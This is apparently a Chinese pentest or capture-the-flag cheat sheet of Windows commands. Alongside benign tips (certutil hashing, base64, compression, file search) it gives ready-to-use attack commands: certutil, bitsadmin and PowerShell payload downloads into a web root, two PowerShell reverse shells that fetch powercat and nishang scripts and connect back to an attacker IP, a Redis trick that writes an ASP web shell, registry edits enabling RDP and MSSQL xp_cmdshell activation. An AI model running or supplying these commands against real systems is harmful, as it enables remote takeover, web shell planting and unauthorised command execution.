windows实战常用命令
windows实战常用命令
jar 解压jar包
jar -xvf xxx.jar : 默认解压到当前目录
powershell调用curl
powershell -c curl http://www.baidu.com -UseBasicParsing
windows下base64编码/解码
certutil -encode a.txt encode.txt
certutil -decode encode.txt a.txt
windows输出散列值
certutil -hashfile 文件名 sha1/sha256/...
windows 特殊符号转义
利用`进行转义
windows 下载文件
#下载文件
certutil -urlcache -split -f http://example.com/a.txt
#下载文件并编码
certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt | certutil -encode dll.txt edll.txt
#适用于windows 7以上版本
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"
powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','E:\phpstudy_pro\WWW\a.ps1')
windows反弹shell
#powershell反弹cmd,最好将github的下载地址替换为自己的vps
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
#powershell反弹powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
系统错误代码
certutil -error 错误代码
windows中的压缩/解压命令
#压缩（makecab 生成的是 CAB 格式文件，即使输出文件名写成 .zip 也不是 zip 压缩包，需用 expand 解压）
makecab e:/test.txt e:/test.zip
#解压，目标文件夹必须已存在
expand e:/test.zip e:/test.txt
expand -F:* test.zip E:\output\
windows全局搜索文件
for /r c:/ %i in (*flag*) do @echo %i
dir C:\ /b/s "flag"
redis写入文件
config get dir
config set dir /var/www/
set aa "\n\n\n<%execute request('chopper')%>\n\n\n"
config get dbfilename
config set dbfilename aa.asp
save
注册表开启3389
#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#关闭3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
MSSQL命令执行
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell',1
GO
RECONFIGURE
GO
exec xp_cmdshell 'whoami'